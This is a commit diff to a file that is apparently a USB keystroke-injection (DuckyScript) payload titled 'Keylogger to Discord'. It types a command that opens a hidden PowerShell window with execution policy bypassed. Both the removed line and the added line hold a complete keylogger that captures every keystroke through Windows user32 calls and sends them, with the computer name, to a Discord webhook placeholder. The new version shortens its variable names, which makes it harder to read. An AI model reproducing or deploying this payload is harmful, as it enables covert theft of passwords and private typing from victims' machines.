Update Keylogger to Discord.txt

OSINT/Keylogger to Discord.txt

@@ -18,5 +18,5 @@ DELAY 500
 STRING powershell -NoP -NonI -Exec Bypass -W hidden
 ENTER
 DELAY 5000
-STRING $dc = "WEBHOOK_GOES_HERE!";$API = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);';$lpth = "$env:temp/t.txt";$API = Add-Type -MemberDefinition $API -Name 'Win32' -Namespace API -PassThru;$no = New-Item -Path $lpth -ItemType File -Force;$fcont = Get-Content -Path $lpth -Raw;$lkt = [System.Diagnostics.Stopwatch]::StartNew();$kth = [TimeSpan]::FromSeconds(10);While ($true){$kpr = $false;try{while ($lkt.Elapsed -lt $kth){Start-Sleep -Milliseconds 30;for ($asc = 9; $asc -le 254; $asc++){$keyst = $API::GetAsyncKeyState($asc);if ($keyst -eq -32767) {$kpr = $true;$lkt.Restart();$null = [console]::CapsLock;$vtkey = $API::MapVirtualKey($asc, 3);$kbst = New-Object Byte[] 256;$checkkbst = $API::GetKeyboardState($kbst);$logchar = New-Object -TypeName System.Text.StringBuilder;if ($API::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)){[System.IO.File]::AppendAllText($lpth, $logchar, [System.Text.Encoding]::Unicode) }}}}}finally{If ($kpr) {$fcont = Get-Content -Path $lpth -Raw;$escmsgsys = $fcont -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')};$jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsgsys} | ConvertTo-Json;Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys;Remove-Item -Path $lpth -Force;$kpr = $false}}$lkt.Restart();Start-Sleep -Milliseconds 10} 
+STRING $dc = "WEBHOOK_GOES_HERE!";$a = '[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);';$a = Add-Type -MemberDefinition $a -Name 'Win32' -Namespace API -PassThru;$b = [System.Diagnostics.Stopwatch]::StartNew();$c = [TimeSpan]::FromSeconds(10);While($true){$d = $false;try{while ($b.Elapsed -lt $c){Sleep -Milliseconds 30;for($e = 8; $e -le 254; $e++){$f = $a::GetAsyncKeyState($e);if ($f -eq -32767){$d = $true;$b.Restart();$null = [console]::CapsLock;$g = $a::MapVirtualKey($e, 3);$h = New-Object Byte[] 256;$j = $a::GetKeyboardState($h);$k = New-Object -TypeName System.Text.StringBuilder;if($a::ToUnicode($e, $g, $h, $k, $k.Capacity, 0)){;$l = $k.ToString();if ($e -eq 8) {$l = "[BKSP]"};if ($e -eq 13) {$l = "[ENT]"};if ($e -eq 27) {$l = "[ESC]"};$m += $l}}}}}finally{If($d){$n = $m -replace '[&<>]', {$args[0].Value.Replace('&', '&amp;').Replace('<', '&lt;').Replace('>', '&gt;')};$o = Get-Date -Format "dd-MM-yyyy HH:mm:ss";$p = $o+" : "+'`'+$n+'`';$q = @{"username" = "$env:COMPUTERNAME" ;"content" = $p} | ConvertTo-Json;irm -Uri $dc -Method Post -ContentType "application/json" -Body $q;$d = $false;$m = ""}}$b.Restart();Sleep -Milliseconds 10}
 ENTER